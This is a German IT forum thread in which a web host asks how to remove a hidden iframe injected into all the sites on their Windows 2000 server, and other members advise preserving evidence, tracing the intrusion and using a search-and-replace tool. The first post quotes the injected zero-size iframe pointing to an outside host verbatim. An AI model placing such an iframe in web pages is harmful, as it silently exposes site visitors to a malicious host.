Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Auf dem Webserver hat sich ein gefährlicher Code eingeschlichen

Frage Microsoft Windows Server

Mitglied: beaxx

beaxx (Level 1) - Jetzt verbinden

31.03.2008, aktualisiert 15:38 Uhr, 3616 Aufrufe, 7 Kommentare

Hallo,

Auf unseren Webserver hat sich ein gefährlicher Code eingeschlichen

<iframe src=http://www.haola123123.com/hkeraone/hker.htm widht=0 height=0></iframe>

jetzt meine Frage

Wir hosten mehrer Website wie lösche ich dieses Iframe von allen Websiten die wir hosten in einen zug oder bleibt mir nichts anderes über als alle Websiten durchgehn und sie händisch rauslöschen?? hat da wer schon erfahren

frage zwei
kennt dieses iframe wer bzw. was für einen schaden richtet es an? bislang hab ich nicht wirklich was drüber gefunden


danke in voraus

mfg
Mitglied: 60730
31.03.2008 um 10:00 Uhr
Frage 3:
Was ist das für ein Webserver und 3b) wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit Windows Boardsuche.

Nicht einfach löschen, sondern rausfinden, wie er auf dein System gekommen ist - das ist deine Aufgabe!
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 10:08 Uhr
Frage 3:
Was ist das für ein Webserver und 3b)
wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit
Windows Boardsuche.

Nicht einfach löschen, sondern
rausfinden, wie er auf dein System gekommen
ist - das ist deine Aufgabe!

Windows 2000 Server
tja das ist eine gute frage muß von ausserhalb irgendwie draufgekommen sein

tja herausfinden ist so eine sache der code gehört dringend von allen websiten entfernd dann kann ich mich drum kümmern wie er draufgekommen ist bei einer manuellen löschung sitz ich einen tag dabei
Bitte warten ..
Mitglied: Gahmuret
31.03.2008 um 10:18 Uhr
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine Kopie der infizierten Seiten erstellen um sie zu analysieren.
Spiel doch einfach die Sicherung der Webseiten über die infizierten.

Schöne Grüße
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 10:29 Uhr
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine
Kopie der infizierten Seiten erstellen um sie
zu analysieren.
Spiel doch einfach die Sicherung der
Webseiten über die infizierten.

Schöne Grüße

Kopie hab ich schon erstellt ich werd mich nachher auch dann ausführlich beschäftigen was der überhaupt macht nur wie ich schon gesagt hab gehört er dringend von allen websiten so schnell wie möglich entfernd
tja die sicherung einspielen an das hab ich auch schon gedacht nur ich dachte es gäbe eine einfachere lösung weils eh immer der selbe code ist der zum entfernen ist

viele grüße
Bitte warten ..
Mitglied: 60730
31.03.2008 um 10:39 Uhr
ich dachte es
gäbe eine einfachere lösung weils
eh immer der selbe code ist der zum entfernen
ist

viele grüße

Hi,

geh mit dem Explorer auf den Webroot und drücke [F3] suchen:

Nach dateien suchen, deren inhalt "widht=0 height=0></iframe>" ist und durch den ganzen Baum suchen lassen, die Fundstellen ansehen. Wenn "nur" hker.htm darunter ist - diese htm. Datei umbenennen, dann "passiert" nicht mehr viel. Wenn du Sie löscht, kannst du nicht mehr rausfinden, wer und wann die Datei raufgespielt hat.

Nun rausfinden, wann diese Datei auf dem Server gelandet ist und ganz genau nachforschen, was wer und wie diese Datei auf die Maschine gekommen ist.
Dann kannste die auch löschen.
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 14:31 Uhr
Hallo,

sodale jetzt hab ich nochmal nachgeschaut mit sicherung einspielen is nicht leider ist die letzte sicherung schon zu lange aus das das einspielen keinen sinn macht

ich hab mal eine website kopiert um nachher nachforschungen anzustellen wie was wo das herkommt

jetzt bräucht ich nur ein tool wie ich denn code von denn restlichen websiten weg bekomme
es sind html , aspx vb und dll datein betroffen anonst werd ich wohl eine woche brauchen bis ich denn code von jeder website händisch entferne

bin für jeden hinweis dankbar

mfg
Bitte warten ..
Mitglied: 60730
31.03.2008 um 15:38 Uhr
Hi,

du liesst offensichtlich meine Postings nicht richtig?

Wenn du die Datei kopierst, wer hat die Datei erzeugt? Richtig du....
Von daher wird das dann mit dem Nachforschen unmöglich.

Ist es immer die gleiche Datei - die den Iframe ausmacht?

Auch auf die Gefahr, dass du möglicherweise auch diesen Post nicht verstehst unter:

http://www.inforapid.de/html/srdownload.htm

diesem Link gibts ein Such und Ersetz Werkzeug.

Auf jeden Fall vorher eine Datensicherung machen, wenigstens jetzt

Bevor du die Einbruchsquelle nicht gefunden hast, ist nicht sicher - oder doch, das der Kram ratzfatz wieder auf dem System landet.
Bitte warten ..
Ähnliche Inhalte
Windows Server
Webserver: ausgelieferten HTML-Code verkleinern
gelöst Frage von petereWindows Server3 Kommentare

Hallo, ich habe einen IIS auf einem Windows 2012R2 mit einer ASP.NET Seite (.aspx-Dateien) laufen und möchte den ausgelieferten ...

Festplatten, SSD, Raid
Dateisystemfehler - wie gefährlich sind sie einzustufen
gelöst Frage von SeraryaFestplatten, SSD, Raid16 Kommentare

Hallo zusammen, der Computer meiner Eltern wurde vor kurzem durch einen IT Dienstleister mit einer Reparaturinstallation versehen und auf ...

Netzwerke
Auffälliger IP-Scan - Gefährlich?
gelöst Frage von PostitNetzwerke13 Kommentare

Hallo @ all Admins, ich weiß grad nicht ob ich mir selber grad im weg stehe oder ob das ...

Router & Routing
OpenVpn mit gefährlichem Halbwissen einrichten...
gelöst Frage von EiswetteRouter & Routing19 Kommentare

Hallo, ich habe mir überlegt, per VPN auf ein Heimnetzwerk zugreifen zu wollen. Allerdings, soll der Server hinter dem ...

Neue Wissensbeiträge
Erkennung und -Abwehr

Necur-Botnet soll Erpressungstrojaner Scarab massenhaft verbreiten

Information von BassFishFox vor 4 StundenErkennung und -Abwehr

12,5 Millionen Spam-Mails aus einem Bot-Netz mit 6 Millionen Computern? Eigentlich eine schwache Leistung. Die Erpresser setzen dabei auf ...

Microsoft

Nadeldrucker-Problem unter Windows - Microsoft liefert Updates

Information von BassFishFox vor 4 StundenMicrosoft

Hat ja nicht lange gedauert. Nachdem die November-Updates für Windows 7, 8.1 und 10 zahlreiche Nadeldrucker lahmgelegt hatten, stellt ...

Linux

Limux-Ende in München: Wie ein Linux Projekt unter Ausschluss der Öffentlichkeit zerstört wurde

Information von Frank vor 12 StundenLinux14 Kommentare

Mein persönlicher Kommentar zum Thema "Limux-Ende". Die SPD-Politikerin Anne Hübner hat die Richtung von München ganz klar definiert: "Wir ...

Batch & Shell

Open Object Rexx: Eine mittlerweile fast vergessene Skriptsprache aus dem Mainframebereich

Information von Penny.Cilin vor 1 TagBatch & Shell9 Kommentare

Ich kann mich noch sehr gut an diese Skriptsprache erinnern und nutze diese auch heute ab und an noch. ...

Heiß diskutierte Inhalte
Linux
Limux-Ende in München: Wie ein Linux Projekt unter Ausschluss der Öffentlichkeit zerstört wurde
Information von FrankLinux14 Kommentare

Mein persönlicher Kommentar zum Thema "Limux-Ende". Die SPD-Politikerin Anne Hübner hat die Richtung von München ganz klar definiert: "Wir ...

Router & Routing
Zwei Netzwerke erstellen
Frage von bunteblumeRouter & Routing14 Kommentare

Hallo Zusammen, Ich möchte gerne ein backup von einem bestimmten Folder welcher auf dem Server regelmässig synchronisiert wird auf ...

Off Topic
Fachkräftemangel in Deutschland? - Talentschmiede schreibt alle 2 Tage die gleichen Stellen aus
Frage von Penny.CilinOff Topic12 Kommentare

Hallo, haben wir in Deutschland Fachkräftemangel? Die Talentschmiede schreibt gefühlt alle zwei Tage dieselben Stellen aus. Und das schon ...

Windows Server
Kann man im KMS nachschauen , wieviele Clients den Key in Anspruch genommen haben
gelöst Frage von rainergugusWindows Server12 Kommentare

Hallo, wir haben einen KMS Windows 10 Key. Dieser ist ja W7 kompatibel. Aber unser Windows 7 Pool registriert ...